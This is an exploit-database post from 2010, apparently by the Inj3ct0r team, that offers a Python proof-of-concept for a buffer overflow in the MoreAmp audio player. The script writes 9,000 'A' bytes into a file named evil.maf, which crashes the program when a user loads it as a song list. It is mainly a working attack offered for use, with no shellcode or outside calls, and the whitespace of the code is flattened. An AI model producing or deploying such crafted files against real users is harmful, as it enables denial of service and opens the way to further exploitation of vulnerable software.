moreamp-overflow.txt
Posted on 20 June 2010
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' __ /'__` / \__ /'__` 0 0 /\_, ___ /\_/\_ ___ ,_/ / _ ___ 1 1 /_/ /' _ ` / /_/_\_<_ /'___ / /`'__ 0 0 / / / / \__/ \_ \_ / 1 1 \_ \_ \_\_ \____/ \____\ \__\ \____/ \_ 0 0 /_//_//_/ \_ /___/ /____/ /__/ /___/ /_/ 1 1 \____/ >> Exploit database separated by exploit 0 0 /___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : Inj3ct0r.com 0 1 [+] Support e-mail : submit[at]inj3ct0r.com 1 0 0 1 ########################################## 1 0 I'm Sid3^effects member from Inj3ct0r Team 1 1 ########################################## 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 ####################################################################################################### #!/usr/bin/python # # Title: MoreAmp (.maf) Buffer Overflow POC # Author: Sid3^effects aKa HaRi # Date: June 19th, 2010 # Platform: Windows XP sp3 En # Thanks to: r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,MA1201,gunslinger_ # greetz to : All ICW members and my friends :) luv y0 guyz # # Usage : File-->Open Song List-->load your evil song list(.maf) print "################################################################################" print " MoreAmp (.maf) Buffer Overflow POC " print " By: Sid3^effects " print " Usage: File-->Open Song List-->load your evil song list(.maf) " print "################################################################################" boom = ("x41" * 9000) try: f1 = open("evil.maf","w"); f1.write(boom); f1.close(); print " MoreAmp (.maf) Buffer Overflow POC" print " File Created Successfully. " print "Usage: [-] Click File [-] Open Song list [-] Load you evil file.maf " except: print "Error."